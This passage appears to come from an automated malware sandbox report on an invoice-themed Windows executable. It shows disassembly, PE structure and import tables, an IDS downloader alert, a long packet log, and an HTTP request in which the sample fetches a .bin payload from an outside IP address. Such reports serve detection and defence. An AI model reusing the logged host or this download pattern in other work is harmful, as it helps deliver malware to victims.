                                push 00000053h
                                pop eax
                                mov dl, 04h
                                mov byte ptr [esp+00000146h], dl
                                cmp word ptr [esp+40h], ax
                                jne 00007F8EC0B62EB3h
                                mov eax, dword ptr [esp+5Ah]
                                add eax, FFFFFFD0h
                                mov word ptr [esp+00000140h], ax
                                jmp 00007F8EC0B62EADh
                                xor eax, eax
                                jmp 00007F8EC0B62E94h
                                mov dl, byte ptr [esp+00000146h]
                                cmp dword ptr [esp+30h], 0Ah
                                jnc 00007F8EC0B62EADh
                                movzx eax, word ptr [esp+38h]
                                mov dword ptr [esp+38h], eax
                                jmp 00007F8EC0B62EA6h
                                mov eax, dword ptr [esp+38h]
                                mov dword ptr [00429DF8h], eax
                                movzx eax, byte ptr [esp+30h]
                                shl ax, 0008h
                                movzx ecx, ax
                                movzx eax, byte ptr [esp+34h]
                                or ecx, eax
                                movzx eax, byte ptr [esp+00000140h]
                                shl ax, 0008h
                                shl ecx, 10h
                                movzx eax, word ptr [eax]
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8a00 | 0xa0 | .rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x51000 | 0x1b7f0 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x817e0 | 0xde8 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x1000 | 0x6c77 | 0x6e00 | 36012ab9d2e677680493425a566cfdc6 | False | 0.6476207386363636 | data | 6.367752971155868 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata | 0x8000 | 0x1896 | 0x1a00 | 2681c11e044872fcca465fa15baf2f57 | False | 0.43028846153846156 | data | 4.8666844580675965 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data | 0xa000 | 0x1fe00 | 0x200 | 3df8362a2e9a26c792a729d2c3b1d553 | False | 0.22265625 | data | 1.680046922364517 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .ndata | 0x2a000 | 0x27000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc | 0x51000 | 0x1b7f0 | 0x1b800 | a8ef53bebf1cdcba6c23232fbc48ab1b | False | 0.38159623579545454 | DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 32.000000, slope 32.314705 | 5.430171507259301 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                RT_ICON | 0x51328 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.16316692298592217
                                RT_ICON | 0x61b50 | 0x5f42 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9831050602804888
                                RT_ICON | 0x67a98 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.29906639004149377
                                RT_ICON | 0x6a040 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.35389305816135086
                                RT_ICON | 0x6b0e8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.4360655737704918
                                RT_ICON | 0x6ba70 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5097517730496454
                                RT_DIALOG | 0x6bed8 | 0xb8 | data | English | United States | 0.6467391304347826
                                RT_DIALOG | 0x6bf90 | 0x144 | data | English | United States | 0.5216049382716049
                                RT_DIALOG | 0x6c0d8 | 0x100 | data | English | United States | 0.5234375
                                RT_DIALOG | 0x6c1d8 | 0x11c | data | English | United States | 0.6056338028169014
                                RT_DIALOG | 0x6c2f8 | 0x60 | data | English | United States | 0.7291666666666666
                                RT_GROUP_ICON | 0x6c358 | 0x5a | data | English | United States | 0.7888888888888889
                                RT_VERSION | 0x6c3b8 | 0x194 | OpenPGP Secret Key | English | United States | 0.5668316831683168
                                RT_MANIFEST | 0x6c550 | 0x29b | XML 1.0 document, ASCII text, with very long lines (667), with no line terminators | English | United States | 0.5667166416791605
                                DLL | Import
                                ADVAPI32.dll | RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
                                SHELL32.dll | ShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
                                ole32.dll | OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                                COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                USER32.dll | DispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
                                GDI32.dll | SetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
                                KERNEL32.dll | WriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode
                                Language of compilation system | Country where language is spoken | Map
                                English | United States |
                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                2025-01-10T07:05:27.108954+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49740 | 212.162.149.153 | 80 | TCP
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Jan 10, 2025 07:05:27.407756090 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.407776117 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.407795906 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.407809019 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.407830954 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.407843113 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.407854080 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.407876968 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.407890081 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.407911062 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.407923937 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.407946110 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.407959938 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.407979965 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.407993078 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.408030033 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.408555031 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.408587933 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.408605099 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.408622980 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.408633947 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.408655882 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.408669949 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.408691883 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.408703089 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.408725977 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.408739090 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.408762932 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.408776045 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.408796072 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.408812046 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.408830881 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.408844948 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.408866882 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.408875942 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.408914089 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.409411907 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.409444094 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.409461975 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.409491062 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.409497976 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.409531116 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.409547091 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.409564972 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.409579039 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.409598112 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.409614086 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.409632921 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.409645081 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.409665108 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.409681082 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.409701109 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.409718037 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.409735918 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.409739971 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.409784079 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410403013 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410434961 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410454988 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410479069 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410489082 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410521984 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410538912 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410556078 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410567999 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410588980 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410608053 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410629034 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410644054 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410662889 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410676956 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410698891 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410710096 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410732985 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410748005 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410782099 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.411283970 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.411331892 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.411341906 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.411370993 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.411382914 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.411398888 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.411421061 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.411454916 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455719948 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455782890 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455792904 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455818892 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455830097 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455853939 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455867052 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455888987 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455902100 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455924988 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455939054 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455960035 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455974102 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455997944 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456008911 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456033945 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456047058 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456067085 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456084013 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456103086 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456120014 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456154108 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456201077 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456234932 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456250906 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456269026 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456279993 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456301928 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456315994 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456337929 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456351995 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456372976 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456387043 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456409931 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456419945 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456439018 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456459999 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456482887 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456598043 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456630945 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456646919 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456685066 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456686974 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456718922 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456733942 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456757069 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456769943 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456790924 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456803083 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456826925 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456839085 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456860065 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456886053 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456895113 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456907034 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456937075 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457098961 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457132101 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457148075 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457168102 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457182884 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457201958 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457216024 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457254887 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457256079 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457289934 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457303047 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457324982 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457339048 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457360029 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457375050 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457393885 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457406998 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457427979 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457439899 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457463980 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457478046 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457499981 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457515001 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457535028 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457549095 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457568884 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457585096 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457602978 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457618952 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457638979 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457653046 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457675934 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457689047 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457724094 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457943916 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457979918 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.458003044 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.458018064 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.458023071 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.458069086 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.492855072 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.492885113 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.492907047 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.492918968 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.492947102 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.492964029 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.492973089 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493006945 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493025064 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493041992 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493048906 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493089914 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493108034 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493160009 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493164062 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493211031 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493211031 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493244886 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493257046 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493279934 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493297100 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493313074 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493336916 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493346930 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493372917 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493392944 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493402004 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493437052 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493451118 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493470907 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493484020 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493505001 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493521929 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493545055 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493556023 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493597031 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493599892 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493632078 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493649006 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493665934 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493685007 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493700981 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493722916 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493733883 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493747950 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493769884 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493778944 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493805885 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493820906 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493861914 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493963957 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493997097 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.494023085 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.494033098 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.494048119 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.494086981 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:38.218430042 CET4974080192.168.2.5212.162.149.153
                                • 212.162.149.153
                                Session ID: 0
                                Source IP: 192.168.2.5
                                Source Port: 49740
                                Destination IP: 212.162.149.153
                                Destination Port: 80
                                PID: 5340
                                Process: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                Timestamp: Jan 10, 2025 07:05:26.581615925 CET
                                Bytes transferred: 184
                                Direction: OUT
                                Data:
                                GET /iXjlIFhRzlkjbZPQm185.bin HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                Host: 212.162.149.153
                                Cache-Control: no-cache
                                Timestamp: Jan 10, 2025 07:05:27.108809948 CET
                                Bytes transferred: 1236
                                Direction: IN
                                Data:
                                HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Wed, 08 Jan 2025 10:34:20 GMT
                                Accept-Ranges: bytes
